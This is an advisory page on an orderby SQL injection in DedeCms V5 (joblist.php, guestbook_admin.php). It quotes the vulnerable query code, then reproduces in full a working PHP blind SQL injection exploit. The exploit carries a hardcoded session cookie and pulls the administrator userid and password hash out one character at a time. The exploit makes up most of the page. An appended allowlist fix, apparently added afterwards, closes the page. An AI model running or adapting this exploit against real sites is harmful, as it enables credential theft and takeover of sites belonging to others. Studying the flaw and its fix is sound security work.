DedeCms V5 orderby parameter injection vulnerability
<p>Affected versions: DedeCms V5</p>
<p>Vulnerability description:</p>
<p>DedeCms has gone through five versions since 2004. Starting with DedeCms V2, DedeCms developed its own template engine, using XML-namespace-style templates, which made life far easier for designers. From V2.1 on, DedeCms's popularity rose sharply and it became the most widely used CMS in China. DedeCms V3 introduced the concept of models, escaping the traditional content-management weakness of scattered modules and decentralised administration. As time went on, however, a purely model-based design proved unable to meet users' needs, and DedeCms 2007 (DedeCms V5) appeared in response. 80sec found multiple serious SQL injection vulnerabilities in the product; a malicious user can use them to read sensitive data from the database, such as the administrator password and the encryption key, and thereby take control of the whole site.</p>
<p>In joblist.php, guestbook_admin.php and similar files the orderby parameter is passed into the database query without any filtering, giving rise to several injection points. The relevant vulnerable code is:</p>
<pre>
if(empty($orderby)) $orderby = 'pubdate';
// reload the list
if($dopost=='getlist'){
PrintAjaxHead();
GetList($dsql,$pageno,$pagesize,$orderby); // call GetList()
$dsql->Close();
exit();
……
function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){
global $cfg_phpurl,$cfg_ml;
$jobs = array();
$start = ($pageno-1) * $pagesize;
$dsql->SetQuery("Select * From sec_jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");
$dsql->Execute(); // $orderby goes straight into the database query
……
</pre>
<p><* Reference</p>
<p>http://www.80sec.com/dedecms-sql-injection.html</p>
<p>*></p>
<p>Test method:</p>
<p>The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only; use them at your own risk!</p>
<pre>
<?php
print_r('
--------------------------------------------------------------------------------
DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit
BY Flyh4t
www.wolvez.org
Thx for all the members of W.S.T and my friend Oldjun
--------------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to DEDEcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}
function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$prefix="dede_";
$cookie="DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa";
// the index expressions were lost in extraction; assumed to check for a leading and trailing slash
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}
/*get $prefix*/
$packet ="GET ".$path."/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11' HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("in your SQL syntax",$html))
{
$temp=explode("From ",$html);
$temp2=explode("member",$temp[1]);
if($temp2[0])
$prefix=$temp2[0];
echo "[+]prefix -> ".$prefix."\n";
}
$chars=array(0); // null terminator
$chars=array_merge($chars,range(48,57)); // numbers
$chars=array_merge($chars,range(97,102)); // a-f letters
echo "[~]exploting now,plz waiting\r\n";
/*get password*/
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+".$prefix."admin+where+id=1),".$j.",1))=".$i.",1,(SELECT+pwd+FROM+".$prefix."member))";
$packet ="GET ".$path."member/guestbook_admin.php?dopost=getlist&pageno=1&".$sql." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi("Subquery returns more than 1 row",$html)) {$password.=chr($i);echo "[+]pwd:".$password."\r\n";break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
/*get userid*/
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+".$prefix."admin+where+id=1),".$j.",1))=".$i.",1,(SELECT+pwd+FROM+".$prefix."member))";
$packet ="GET ".$path."member/guestbook_admin.php?dopost=getlist&pageno=1&".$sql." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi("Subquery returns more than 1 row",$html)) {$admin.=chr($i);echo "[+]userid:".$admin."\r\n";break;}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
print_r('
--------------------------------------------------------------------------------
[+]userid -> '.$admin.'
[+]pwd(md5 24位) -> '.$password.'
--------------------------------------------------------------------------------
');
function is_hash($hash)
{
// the character class was lost in extraction; assumed to be the hex alphabet used above
if (ereg("^[0-9a-f]{24}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
</pre>
<p>aianquan recommendation:</p>
<p>None yet</p>
<p>http://www.dedecms.com// aianquan.com</p>
<p>(Compiled and published by editor pasu)</p>
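The fix a maintainer would apply to the GetList() shown above is to stop interpolating the request parameter and accept only a known column name, with the pagination values cast to integers. The following is an added example, not DedeCms code; the StubDsql class, the $cfg_ml value and the list of allowed columns are constructed for illustration, and SetQuery()/Execute() mirror the calls in the advisory's snippet.

```php
<?php
// Added example: allowlist the ORDER BY column instead of trusting $orderby.

function safe_orderby($orderby, array $allowed, $default)
{
    // Only an exact, case-sensitive match with a known column is accepted;
    // anything else (including "11' and If(...)" payloads) becomes $default.
    return in_array($orderby, $allowed, true) ? $orderby : $default;
}

function GetListSafe($dsql, $pageno, $pagesize, $orderby = 'pubdate')
{
    global $cfg_ml;
    // Allowed column names are an assumption for this example.
    $orderby  = safe_orderby($orderby, array('pubdate', 'id', 'title'), 'pubdate');
    $pageno   = max(1, (int)$pageno);              // never negative or non-numeric
    $pagesize = max(1, min(100, (int)$pagesize));  // bounded page size
    $start    = ($pageno - 1) * $pagesize;
    $memberId = (int)$cfg_ml->M_ID;
    // Every interpolated value is now either an integer or one of the literals above.
    $dsql->SetQuery("SELECT * FROM sec_jobs WHERE memberID='$memberId' "
        . "ORDER BY $orderby DESC LIMIT $start,$pagesize");
    $dsql->Execute();
}

// Self-check with a constructed stub of $dsql and a constructed $cfg_ml.
class StubDsql
{
    public $sql;
    function SetQuery($q) { $this->sql = $q; }
    function Execute() {}
}
$cfg_ml = (object)array('M_ID' => 39255);
$dsql   = new StubDsql();

// The advisory's payload is discarded and the default column is used.
GetListSafe($dsql, 1, 20, "11' and If(ASCII(SUBSTRING((SELECT pwd FROM dede_admin where id=1),1,1))=97,1,(SELECT pwd FROM dede_member))");
echo $dsql->sql, "\n";   // ... ORDER BY pubdate DESC LIMIT 0,20

// A legitimate column passes through; string page numbers are cast to int.
GetListSafe($dsql, "2", 20, 'id');
echo $dsql->sql, "\n";   // ... ORDER BY id DESC LIMIT 20,20
```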